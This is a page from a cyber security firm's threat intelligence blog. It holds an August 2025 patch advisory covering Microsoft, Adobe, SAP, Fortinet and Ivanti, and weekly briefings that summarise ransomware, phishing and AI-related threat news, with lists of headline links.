Threat Intelligence Blog
Contact us to discuss any insights from our Blog, and how we can support you in a tailored threat intelligence report.
Black Arrow Cyber Advisory - 13 August 2025 - Security Updates from Microsoft, Adobe, SAP, Fortinet and Ivanti
Black Arrow Cyber Advisory 13 August 2025 - Security Updates from Microsoft, Adobe, SAP, Fortinet and Ivanti
Executive Summary
August’s Patch Tuesday delivers substantial updates across enterprise platforms. Microsoft addresses 107 vulnerabilities—including one zero-day and 13 critical flaws—spanning Windows, Office, and server products. Adobe issues multiple bulletins for Commerce, InCopy, and FrameMaker. SAP releases 15 Security Notes for enterprise systems. Fortinet publishes critical advisories for Security Fabric, FGFM, and SSL-VPN components. Ivanti provides three updates for its secure gateway products. Immediate patching is advised, particularly for critical RCE and privilege-escalation vulnerabilities.
Vulnerabilities by Vendor
Microsoft[¹]: 107 vulnerabilities addressed, including one publicly disclosed zero-day and 13 critical flaws. Patching is advised across Windows, Office, SQL Server, and other widespread components.
Adobe[²]: At least 19 vulnerabilities in Adobe Commerce, InCopy, and FrameMaker. Focus should be on critical arbitrary code execution fixes.
SAP[³]: 15 Security Notes affecting S/4HANA, Business Suite, and other SAP platforms. HotNews and high-priority advisories should be applied first.
Fortinet[⁴]: Three advisories dated 12 August 2025—covering Security Fabric privilege issues, FGFM authentication weaknesses (in FortiOS/FortiProxy/FortiPAM), and an SSL-VPN integer-overflow DoS vulnerability.
Ivanti[⁵]: Three product-specific advisories on August Patch Tuesday — for Connect Secure, Policy Secure, and ZTA Gateways — focused on gateway access and authentication security.
What’s the risk to me or my business?
The presence of actively exploited zero-days and critical RCE/privilege-escalation vulnerabilities across major enterprise platforms significantly elevates the risk of data breaches, lateral movement, malware deployment, and full system compromise.
What can I do?
Black Arrow recommends promptly applying the available security updates for all affected products. Prioritise patches for vulnerabilities that are actively exploited or rated as critical or high severity. Regularly review and update your organisation’s security policies and ensure that all systems are running supported and up-to-date software versions.
Footnotes:
¹ Microsoft — August 2025 Security Update Release Notes: https://msrc.microsoft.com/update-guide/releaseNote/2025-Aug
² Adobe — Adobe Product Security Bulletin: https://helpx.adobe.com/security/security-bulletin.html
³ SAP — SAP Security Patch Day August 2025: https://support.sap.com/en/my-support/knowledge-base/security-notes-news/august-2025.html
⁴ Fortinet Security Advisories: https://www.fortiguard.com/psirt
⁵ Ivanti August 2025 Security Advisory: https://forums.ivanti.com/s/article/August-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-Multiple-CVEs?language=en_US
Black Arrow Cyber Threat Intelligence Briefing 08 August 2025
Black Arrow Cyber Threat Intelligence Briefing 08 August 2025:
-AI Can Plan and Execute Cyber Attacks Without Human Intervention
-Ransomware Gangs Attacking Managed Service Providers with Stolen Login Credentials and Vulnerabilities
-Hackers Uses Social Engineering Attack to Gain Remote Access in 5 Minutes
-Social Engineering Attacks Surged This Past Year
-Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration
-Cyber Criminals Are Getting Personal, and It’s Working
-Ransomware Victims Are Still Paying Up, Some More Than Once
-SMBs Struggle with Alert Overload, Cloud Blind Spots and Insider Threats
-Britons Face Cyber-Attack Surge as UK Becomes Most Targeted Country in Europe
-Exposed Without a Breach - The Cost of Data Blindness
-Cyber Insurance Premiums Are Soaring — And So Are Your Risks
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
This week, we start with insights into the evolving tactics of attackers. A study has shown how AI can plan and execute complex cyber attacks without human intervention, while other attackers are using stolen credentials and vulnerabilities to gain access to managed service providers. Social engineering attacks have surged over the past year, with attackers able to access their target’s corporate systems within 5 minutes. Once they are in, the attackers are expanding their tactics beyond encryption and exfiltration, and victims continue to pay the ransom demands.
We also report that the UK is third most targeted country globally, behind the US and Canada, and we highlight the challenges facing small and medium sized business in particular. We also highlight that cyber incidents do not only happen as part of an attack; they also occur when data is vulnerable due to mismanaged systems and accesses. As all these risks increase, we also highlight the potential value of cyber insurance as part of a robust and planned cyber security strategy
Top Cyber Stories of the Last Week
AI Can Plan and Execute Cyber Attacks Without Human Intervention
A recent study from Carnegie Mellon University, in collaboration with Anthropic, has demonstrated the growing capabilities of AI in cyber security. The research showed that large language models (LLMs) can autonomously plan and execute complex cyber attacks, such as replicating the 2017 Equifax breach, without any human intervention. The AI functioned as the planner, delegating tasks to sub-agents, and managed to deploy malware and extract data. While this work was conducted in a controlled environment, it raises significant concerns about the potential for AI-driven cyber attacks. These developments signal a shift towards more autonomous and adaptive threats.
Ransomware Gangs Attacking Managed Service Providers with Stolen Login Credentials and Vulnerabilities
Ransomware groups Akira and Lynx are increasingly targeting managed service providers (MSPs) and small businesses, exploiting stolen credentials and vulnerabilities. These groups have compromised over 365 organisations, with Akira evolving into one of the top 10 ransomware operations, focusing on MSPs to access extensive client networks. Both groups utilise techniques such as credential-based attacks, file encryption, and data theft, to extort ransoms. They share similarities with the notorious Conti ransomware, indicating potential code reuse. The attacks also involve evasion tactics such as disabling security software and targeting backup systems to ensure successful encryption.
https://cybersecuritynews.com/akira-and-lynx-ransomware/
Hackers Uses Social Engineering Attack to Gain Remote Access in 5 Minutes
A recent cyber attack investigation demonstrated how threat actors compromised corporate systems in under five minutes using social engineering and trusted business tools. Hackers impersonated IT support to gain remote access via QuickAssist, then deployed malicious PowerShell scripts to install a remote access tool and harvest credentials. The attack, which leveraged legitimate Windows tools, highlights the growing risk of social engineering tactics in bypassing security. The incident underscores the need for improved user training and prompt incident response to mitigate the impact of such rapid breaches.
https://cybersecuritynews.com/hacked-in-300-seconds/
Social Engineering Attacks Surged This Past Year
Palo Alto Networks’ latest report reveals that social engineering attacks have become the leading method for cyber attacks over the past year, with 36% of the incident response cases traced back to this tactic. These attacks, used by a variety of groups, including financially motivated cyber criminals and nation-state operatives, often target employees with system-wide access, such as help desk staff and administrators. Social engineering is particularly effective in compromising sensitive data, with 60% of such attacks leading to data exposure. The report highlights that these attacks have spiked in frequency, especially from groups like Scattered Spider and North Korean operatives.
https://cyberscoop.com/social-engineering-top-attack-vector-unit-42/
Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration
A recent Barracuda report reveals that ransomware actors have expanded their tactics beyond data encryption and exfiltration. Other common activities included wiping backups or deleting shadow copies of files (37%), installing additional malware or payloads (29%), infecting multiple endpoints such as computers or servers (26%), and threatening partners, shareholders, or customers (22%). Attackers also threatened to alert the authorities or the press (21%) and even threatened staff (16%). Only a quarter (24%) of incidents involved data encryption. Data was stolen and either leaked or retained in 54% of cases. These multidimensional tactics increase pressure on victims to pay.
https://www.infosecurity-magazine.com/news/ransomware-expand-encryption/
Cyber Criminals Are Getting Personal, and It’s Working
Cyber criminals are increasingly personalising their attacks, with phishing kits becoming harder to detect and reverse-engineer. A key tactic involves using custom-made kits, driven by AI, to scale campaigns. Email-based attacks continue to rise, with business email compromise (BEC) becoming a prominent threat. Lumma Stealer malware is the most prevalent, often delivered through common file attachments or cloud services. Financial lures and urgency-based messages remain the top tactics used to trick victims, with cyber criminals employing sophisticated methods to bypass detection. The growing use of AI is enabling more targeted and scalable phishing efforts.
https://www.helpnetsecurity.com/2025/08/07/email-attacks-q2-2025/
Ransomware Victims Are Still Paying Up, Some More Than Once
A recent report from Semperis reveals that ransomware attacks remain a significant threat, with 81% of US firms and 78% globally targeted in the past year. Attackers succeed in over half of cases, and many companies pay ransoms multiple times. The majority of payments range between $500,000 and $1 million, but some companies face repeated attacks. The report highlights the growing risk of identity infrastructure breaches, including Active Directory and Okta, which enable attackers to persist and escalate their reach. Organisations are urged to automate defences, secure identity systems, and prepare comprehensive ransomware-response plans.
SMBs Struggle with Alert Overload, Cloud Blind Spots and Insider Threats
TrustLayer’s 2025 UK Cyber Resilience Report reveals a growing challenge for UK SMBs in managing cyber security. With shrinking budgets and rising alert volumes, organisations struggle to protect against email, cloud, and insider threats. The report highlights critical gaps, including limited cloud visibility, outdated security tools, and insider risks, with nearly one in three data breaches originating from employees. Additionally, alert overload is leading to stress and burnout in security teams. TrustLayer recommends streamlining security tools, automating processes, and focusing on human-centric operations to build a more resilient, efficient cyber security strategy.
Britons Face Cyber-Attack Surge as UK Becomes Most Targeted Country in Europe
The UK has seen a significant rise in cyber attacks, making it the third most targeted country globally, behind the US and Canada. According to a NordVPN report, there has been a 7% increase in malware incidents, totalling 103 million, with the UK having the highest malware concentration per user in Europe. Cyber criminals often use trusted brands like Google, Amazon, and Yahoo to deceive users into exposing sensitive data. Malware now includes a wide range of threats, from data theft to device hijacking. The rise in online scams and increasingly sophisticated techniques highlights growing cyber security risks for UK businesses and consumers.
Exposed Without a Breach - The Cost of Data Blindness
Data blindness, where sensitive information is exposed without traditional cyber attack methods, poses a significant risk to organisations. This occurs when misconfigured systems, overpermissioned users, and unmonitored data flows leave critical data vulnerable. Traditional tools fail to account for modern data environments, where information is scattered across cloud platforms, third-party services, and AI-generated content. As a result, visibility gaps lead to unnoticed breaches, with the consequences often as severe as a traditional cyber attack. To mitigate this, organisations must adopt continuous, real-time data visibility, ensuring sensitive data is always monitored and aligned with business context.
https://securityaffairs.com/180813/security/exposed-without-a-breach-the-cost-of-data-blindness.html
Cyber Insurance Premiums Are Soaring — And So Are Your Risks
The global cyber insurance market is set to grow rapidly, doubling by 2030, driven by rising cyber risks such as ransomware and stringent regulatory requirements like GDPR and NIS2. As cyber attacks become more frequent and costly, businesses are increasingly relying on insurance as a safety net. Insurers are adjusting by incorporating real-time threat intelligence to price policies more accurately. Firms should consider the appropriateness of their cyber insurance to protect client data and manage cyber risks effectively. It is critical for firms to review their policies and ensure adequate coverage.
https://abovethelaw.com/2025/08/cyber-insurance-premiums-are-soaring-and-so-are-your-risks/
Governance, Risk and Compliance
CISOs say they're prepared, their data says otherwise - Help Net Security
Why 90% of cyber leaders are feeling the heat - Help Net Security
Cybersecurity must be a top priority for businesses from beginning to end | TechRadar
Mind the overconfidence gap: CISOs and staff don’t see eye to eye on security posture | CSO Online
75 percent of cybersecurity leaders don’t trust their own data - BetaNews
The Heat Wasn't Just Outside: Cyber Attacks Spiked in Summer 2025
Summer: Why cybersecurity must be strengthened as vacations abound | CSO Online
Cybersecurity Incident Response Needs A War Room, Not A Playbook
Prioritizing Cybersecurity: Essential for Business Survival Against AI Threats
Threats
Ransomware, Extortion and Destructive Attacks
Nearly one-third of ransomware victims are hit multiple times, even after paying hackers | IT Pro
New EDR killer tool used by eight different ransomware groups
Ransomware groups shift to quadruple extortion to maximize pressure - Help Net Security
75% of UK business leaders are willing to risk criminal penalties to pay ransoms | IT Pro
Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security
Ransomware goes cloud native to target your backup infrastructure | CSO Online
Ransomware Actors Expand Tactics Beyond Encryption and Exfiltration - Infosecurity Magazine
On the Rise: Ransomware Victims, Breaches, Infostealers
This devious ransomware is able to hijack your system to turn off Microsoft Defender | TechRadar
Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices
Ransomware Surges as Attempts Spike 146%
Nimble 'Gunra' Ransomware Evolves With Linux Variant
Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks
Ransomware gangs join attacks targeting Microsoft SharePoint servers
Study: 78% of Companies Targeted with Ransomware
Ransomware-as-a-Service Economy - Trends, Targets & Takedowns
Ransomware attacks: The evolving extortion threat to US financial institutions | CSO Online
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
Royal and BlackSuit ransomware gangs hit over 450 US companies
Qilin Ransomware Affiliate Panel Login Credentials Exposed Online – DataBreaches.Net
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
Countering the Threat of Ransomware as a Service
Why we shouldn’t just repeat ransomware groups’ claims, Sunday edition – DataBreaches.Net
Authorities seize BlackSuit ransomware gang's servers | TechCrunch
Ransomware Victims
Ransomware attacks cripple government services across Dutch Caribbean islands | NL Times
Ransomware plunges insurance company into bankruptcy | Fortra
SBM investigates alleged cyber incident amid claims of reputational threat - NEWS.MC - Monaco News
Phishing & Email Based Attacks
Cybercriminals are getting personal, and it's working - Help Net Security
Attackers exploit link-wrapping services to steal Microsoft 365 logins
Phishers Abuse M365 'Direct Send' to Spoof Internal Users
Mozilla warns Firefox add-on devs of new phishing attacks • The Register
Other Social Engineering
Cybercriminals are getting personal, and it's working - Help Net Security
Social engineering attacks surged this past year, Palo Alto Networks report finds | CyberScoop
Hackers Uses Social Engineering Attack to Gain Remote Access in 300 Seconds
Gen Z in the Crosshairs: Cybercriminals Shift Focus to Young, Digital-Savvy Workers - SecurityWeek
QR Code Quishing Attacks Surge 50%: Protect Against Data Theft
CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Cisco Victim of Voice Phishing Attack, Customer Data Stolen
How not to hire a North Korean IT spy | CSO Online
Indeed recruiter text scam: I responded to one of the “job” messages. It got weird quickly.
Fraud, Scams and Financial Crime
Experts Alarmed by UK Government’s Companies House ID Checks - Infosecurity Magazine
Scammers abusing WhatsApp group invites | Cybernews
Fraud controls don’t guarantee consumer trust - Help Net Security
Indeed recruiter text scam: I responded to one of the “job” messages. It got weird quickly.
AI Fuels Record Number of Fraud Cases - Infosecurity Magazine
Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop
Artificial Intelligence
9 things you shouldn't use AI for at work | ZDNET
Your employees uploaded over a gig of files to GenAI tools last quarter - Help Net Security
CrowdStrike: Threat Actors Increasingly Lean on AI Tools
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Russian Cyber Threat Group Uses AI-Guided Malware
Financial sector faced most AI-powered cyberattacks: survey
Rising Mobile Browser Attacks: AI Threats and Key Defenses
AI Guardrails Under Fire: Cisco's Jailbreak Demo Exposes AI Weak Points - SecurityWeek
Cybersecurity Pros Say IoT, Large Language Models Are Risk Areas of Concern
AI can write your code, but nearly half of it may be insecure - Help Net Security
Security Researchers Just Hacked ChatGPT Using A Single 'Poisoned' Document
AI Fuels Record Number of Fraud Cases - Infosecurity Magazine
Vibe Coding: When Everyone’s a Developer, Who Secures the Code? - SecurityWeek
NIST seeks to avoid reinventing the wheel with AI security guidance
Prioritizing Cybersecurity: Essential for Business Survival Against AI Threats
What's keeping risk leaders up at night? AI, tariffs, and cost cuts - Help Net Security
42% of Developers Using AI Say Their Codebase is Now Mostly AI-Generated
Anthropic wants to stop AI models from turning evil - here's how | ZDNET
Claude Vulnerabilities Let Attackers Execute Unauthorized Commands With its Own Help
Gemini AI Promptware Attack Exploits Calendar Invites to Hijack Smart Homes
Malware
On the Rise: Ransomware Victims, Breaches, Infostealers
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Russian Cyber Threat Group Uses AI-Guided Malware
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
Staggering 800% Rise in Infostealer Credential Theft - Infosecurity Magazine
New 'Shade BIOS' Technique Beats Every Kind of Security
New Undectable Plague Malware Attacking Linux Servers to Gain Persistent SSH Access
Antivirus vendors fail to spot persistent Linux backdoor • The Register
Python-powered malware grabs 200K passwords, credit cards • The Register
CISA releases malware analysis for Sharepoint Server attack • The Register
Fake WhatsApp developer libraries hide destructive data-wiping code
Wave of 150 crypto-draining extensions hits Firefox add-on store
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
Mobile
Rising Mobile Browser Attacks: AI Threats and Key Defenses
PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads
Google addresses six vulnerabilities in August’s Android security update | CyberScoop
PlayPraetor Android RAT expands rapidly across Spanish and French-speaking regions
France orders officials to drop foreign messaging apps over cybersecurity fears
Internet of Things – IoT
Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security
Cybersecurity Pros Say IoT, Large Language Models Are Risk Areas of Concern
The humble printer highlights overlooked security flaws | CIO Dive
Gemini AI Promptware Attack Exploits Calendar Invites to Hijack Smart Homes
Data Breaches/Leaks
On the Rise: Ransomware Victims, Breaches, Infostealers
Legal aid cyber-attack has pushed sector towards collapse, say lawyers | Legal aid | The Guardian
Google says hackers stole its customers' data by breaching its Salesforce database | TechCrunch
Exposed Without a Breach: The Cost of Data Blindness
Cisco Victim of Voice Phishing Attack, Customer Data Stolen
Top MoD civil servant to leave in wake of Afghan data breach - BBC News
Average global data breach cost now $4.44 million - Help Net Security
Swipe Right for a Cyberattack: Dating Sites, EV Chargers, and Sex Toys
No, 16 Billion New User Credentials Weren’t Leaked—but the Risk Remains | Proofpoint US
Allianz faces fresh lawsuit as cyberattack exposes 1.4 million records | Insurance Business America
Bouygues Telecom Data Breach Exposes 6.4 Million Customer Records - Infosecurity Magazine
Air France and KLM disclosed data breaches following the hack of a third-party platform
Chanel and Pandora latest retailers to be hit by cyber attacks | Retail Week
Pandora confirms data breach amid ongoing Salesforce data theft attacks
Allianz Life cyberattack gets worse as company confirms Social Security numbers stolen | TechRadar
Lovense flaws expose emails and allow account takeover
PBS confirms data breach after employee info leaked on Discord servers
Despite data breaches like the Tea app, companies see little consequence - The Washington Post
Florida prison exposes visitor contact info to every inmate • The Register
Organised Crime & Criminal Actors
Cybercriminals are getting personal, and it's working - Help Net Security
Why the Old Ways Are Still the Best for Most Cybercriminals
From fake CAPTCHAs to RATs: Inside 2025's cyber deception threat trends - Help Net Security
Python-powered malware grabs 200K passwords, credit cards • The Register
Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally
Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop
Countering the Threat of Ransomware as a Service
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Wave of 150 crypto-draining extensions hits Firefox add-on store
Insider Risk and Insider Threats
Your employees uploaded over a gig of files to GenAI tools last quarter - Help Net Security
CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop
Laptop Farm: What It Is & How It's Used, Explained
How not to hire a North Korean IT spy | CSO Online
Insurance
Cyber Insurance Premiums Are Soaring — And So Are Your Risks - Above the Law
Supply Chain and Third Parties
Air France and KLM disclosed data breaches following the hack of a third-party platform
Chanel and Pandora latest retailers to be hit by cyber attacks | Retail Week
Pandora confirms data breach amid ongoing Salesforce data theft attacks
Cloud/SaaS
Google says hackers stole its customers' data by breaching its Salesforce database | TechCrunch
Attackers exploit link-wrapping services to steal Microsoft 365 logins
Ransomware goes cloud native to target your backup infrastructure | CSO Online
Phishers Abuse M365 'Direct Send' to Spoof Internal Users
How the UK's cloud strategy was hijacked by a hyperscaler duopoly | Computer Weekly
New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at - Infosecurity Magazine
Outages
Identity and Access Management
Privilege Escalation Issue in Amazon ECS Leads to IAM Hijacking
Encryption
Encryption Made for Police and Military Radios May Be Easily Cracked | WIRED
Linux and Open Source
New Linux backdoor Plague bypasses auth via malicious PAM module
New Undectable Plague Malware Attacking Linux Servers to Gain Persistent SSH Access
Antivirus vendors fail to spot persistent Linux backdoor • The Register
New malware avoids antivirus detection, unleashes a "plague" on your devices | TechRadar
Nimble 'Gunra' Ransomware Evolves With Linux Variant
Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW
Lansweeper finds Linux is growing on business endpoints • The Register
Yes, you need a firewall on Linux - here's why and which to use | ZDNET
Passwords, Credential Stuffing & Brute Force Attacks
Attackers exploit link-wrapping services to steal Microsoft 365 logins
Python-powered malware grabs 200K passwords, credit cards • The Register
Vietnamese Hackers Use PXA Stealer, Hit 4,000 IPs and Steal 200,000 Passwords Globally
Staggering 800% Rise in Infostealer Credential Theft - Infosecurity Magazine
Hackers Steal 1.8 Billion Credentials, 9 Billion Data Records
Social Media
15,000 Fake TikTok Shop Domains Deliver Malware, Steal Crypto via AI-Driven Scam Campaign
Amnesty slams X for 'central role' in fueling UK violence • The Register
Instagram lets you see your friends' locations now, and vice versa - here's how | ZDNET
Malvertising
PlayPraetor Android Trojan Infects 11,000+ Devices via Fake Google Play Pages and Meta Ads
SocGholish Malware Spread via Ad Tools; Delivers Access to LockBit, Evil Corp, and Others
Regulations, Fines and Legislation
Europe’s Cybersecurity Puzzle: NIS2 Progress in 30 Pieces | McDermott Will & Schulte - JDSupra
75% of UK business leaders are willing to risk criminal penalties to pay ransoms | IT Pro
The VPNs allowing youngsters to bypass UK age verification rules
One Week of the Online Safety Act: Cyber Experts Weigh In - IT Security Guru
'Can I see some ID?' As online age verification spreads, so do privacy concerns | CBC News
The Cyber Security and Resilience Bill | Technology Law Dispatch
CISA, USCG make example out of organization they audited • The Register
Former and current officials clash over CISA’s role in US cyber defenses at Black Hat - Nextgov/FCW
Senate confirms national cyber director pick Sean Cairncross | CyberScoop
Annual ODPA report highlights local Data Law adequacy - Bailiwick Express News Guernsey
Illumina Settles Allegations of Cyber Vulnerabilities in Genomic Sequencing for $9.8M
America Is Blinding Itself - by Mark Hertling - The Bulwark
US Agencies Fail IT Security Audits, Jeopardizing National Security
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
Models, Frameworks and Standards
Europe’s Cybersecurity Puzzle: NIS2 Progress in 30 Pieces | McDermott Will & Schulte - JDSupra
The Cyber Security and Resilience Bill | Technology Law Dispatch
NIST seeks to avoid reinventing the wheel with AI security guidance
NCSC Updates Cyber Assessment Framework to Build UK CNI Resilience - Infosecurity Magazine
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
Careers, Working in Cyber and Information Security
How CISOs are training the next generation of cyber leaders | CSO Online
The Five Steps to Increase UK Cyber Resilience Detailed | SC Media UK
5 hard truths of a career in cybersecurity — and how to navigate them | CSO Online
Law Enforcement Action and Take Downs
Details emerge on BlackSuit ransomware takedown | CyberScoop
Nigerian accused of hacking tax preparation businesses extradited to US | CyberScoop
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
NATO condemns Russian cyber activities
Europe must adapt to Russia's hybrid cyber war
Pro-Iran Hackers Aligned Cyber with Kinetic War Aims - Infosecurity Magazine
Iranian hackers were more coordinated, aligned during Israel conflict than it seemed | CyberScoop
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan
Nation State Actors
China
Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW
Storm-2603 Deploys DNS-Controlled Backdoor in Warlock and LockBit Ransomware Attacks
China’s botched Great Firewall upgrade invites attacks • The Register
Chinese Nation-State Hackers Breach Southeast Asian Telecoms
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
CL-STA-0969 Installs Covert Malware in Telecom Networks During 10-Month Espionage Campaign
Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan
Why an explosive fight erupted over the UK's new Chinese embassy - BBC News
Chinese cyberattack on US nuclear agency highlights importance of cyber hygiene | The Strategist
Nvidia says its chips have no 'backdoors' after China raises concerns | Fox Business
China Says US Exploited Old Microsoft Flaw for Cyberattacks - Bloomberg
Russia
NATO condemns Russian cyber activities
Europe must adapt to Russia's hybrid cyber war
Russian Cyber Threat Group Uses AI-Guided Malware
DoD Secretary Hegseth Draws A Line: Cybersecurity No Longer Optional
Ukrainian drone attacks are causing blackouts and shutdowns for Russian mobile internet | TechRadar
Iran
Pro-Iran Hackers Aligned Cyber with Kinetic War Aims - Infosecurity Magazine
Iranian hackers were more coordinated, aligned during Israel conflict than it seemed | CyberScoop
North Korea
CrowdStrike investigated 320 North Korean IT worker cases in the past year | CyberScoop
Laptop Farm: What It Is & How It's Used, Explained
Foreign adversaries are trying to weaponize open-source software, report finds - Nextgov/FCW
Tools and Controls
Cyber Insurance Premiums Are Soaring — And So Are Your Risks - Above the Law
AI can write your code, but nearly half of it may be insecure - Help Net Security
New EDR killer tool used by eight different ransomware groups
75 percent of cybersecurity leaders don’t trust their own data - BetaNews
One Week of the Online Safety Act: Cyber Experts Weigh In - IT Security Guru
Privilege Escalation Issue in Amazon ECS Leads to IAM Hijacking
Ransomware goes cloud native to target your backup infrastructure | CSO Online
Exposed Without a Breach: The Cost of Data Blindness
The humble printer highlights overlooked security flaws | CIO Dive
What's keeping risk leaders up at night? AI, tariffs, and cost cuts - Help Net Security
Fraud controls don’t guarantee consumer trust - Help Net Security
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
Mind the overconfidence gap: CISOs and staff don’t see eye to eye on security posture | CSO Online
CISOs say they're prepared, their data says otherwise - Help Net Security
Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks
Vibe Coding: When Everyone’s a Developer, Who Secures the Code? - SecurityWeek
China’s botched Great Firewall upgrade invites attacks • The Register
Cybersecurity Incident Response Needs A War Room, Not A Playbook
Yes, you need a firewall on Linux - here's why and which to use | ZDNET
Reports Published in the Last Week
Other News
Man-in-the-Middle Attack Prevention Guide
MacOS Under Attack: How Organizations Can Counter Rising Threats
Strengthening the UK's data center infrastructure | TechRadar
Councils are the weak link in UK cyber defences
Cyberattacks Making Consumers More Cautious About Online Shopping
Energy companies are blind to thousands of exposed services - Help Net Security
UK Boosts Cybersecurity Budget to Shield Critical Infrastructure
UK Ministry of Defence to bolster troops’ cyber skills | Cybernews
Monaco fights back after cybercriminals target national icons - NEWS.MC - Monaco News
Why blow up satellites when you can just hack them? • The Register
Vulnerability Management
Ransomware is up, zero-days are booming, and your IP camera might be next - Help Net Security
The Critical Flaw in CVE Scoring
Exposed Without a Breach: The Cost of Data Blindness
Misconfigurations Are Not Vulnerabilities: The Costly Confusion Behind Security Risks
AI Beats Hackers to a Zero-Day Cybersecurity Discovery, Twice
Microsoft’s Update Mistake—45% Of All Windows Users Now At Risk
US Agencies Fail IT Security Audits, Jeopardizing National Security
Vulnerabilities
New Microsoft Exchange Vulnerability Puts Hybrid Cloud Environments at Risk- Infosecurity Magazine
Akira Ransomware Exploits SonicWall VPNs in Likely Zero-Day Attack on Fully-Patched Devices
Google fixed two Qualcomm bugs that were actively exploited in the wild
Android's August 2025 Update Patches Exploited Qualcomm Vulnerability - SecurityWeek
Enterprise Secrets Exposed by CyberArk Conjur Vulnerabilities - SecurityWeek
Google addresses six vulnerabilities in August’s Android security update | CyberScoop
CISA releases malware analysis for Sharepoint Server attack • The Register
Ransomware gangs join attacks targeting Microsoft SharePoint servers
Apple iOS 18.6 Update Patches 29 Security Flaws, Fixes Exploited WebKit Bug
Adobe issues emergency fixes for AEM Forms zero-days after PoCs released
Millions of Dell PCs with Broadcom chips open to attack • The Register
New Ghost Calls tactic abuses Zoom and Microsoft Teams for C2 operations
RCE Flaw in AI Coding Tool Poses Software Supply Chain Risk
Vibe coding tool Cursor allows persistent code execution • The Register
Trend Micro fixes two actively exploited Apex One RCE flaws
Akira ransomware abuses CPU tuning tool to disable Microsoft Defender
Proton fixes Authenticator bug leaking TOTP secrets in logs
Critical Vulnerabilities Found in NVIDIA's Triton Inference Server - Infosecurity Magazine
Adobe Issues Out-of-Band Patches for AEM Forms Vulnerabilities With Public PoC - SecurityWeek
Microsoft caught in crossfire of U.S.-China cyber war - Cryptopolitan
China: US spies used Microsoft Exchange 0-day to steal info • The Register
Nvidia Patches Critical RCE Vulnerability Chain
CISA Adds 3 D-Link Vulnerabilities to KEV Catalog Amid Active Exploitation Evidence
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 01 August 2025
Black Arrow Cyber Threat Intelligence Briefing 01 August 2025:
-HR Documents Appear in 82% of All Data Breaches
-Scattered Spider Ransomware Group Infiltrating Slack and Microsoft Teams to Target Vulnerable Employees
-Gen Z Falls for Scams 2x More Than Older Generations
-Millions Hit in Quishing Attacks as Malicious QR Codes Surge
-Ransomware Attacks Escalate to Physical Threats Against Executives
-Ransomware Up 179%, Credential Theft Up 800%: 2025’s Cyber Threat Landscape Intensifies
-New Chaos Ransomware Emerges, Launches Wave of Attacks
-Seychelles Commercial Bank Reported Cyber Security Incident
-Third of Exploited Vulnerabilities Weaponised Within a Day of Disclosure
-Sam Altman Warns That AI Is About to Cause a Massive "Fraud Crisis" in Which Anyone Can Perfectly Imitate Anyone Else
-Getting a Cyber Security Vibe Check on Vibe Coding
-The Growing Impact of AI and Quantum on Cyber Security
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
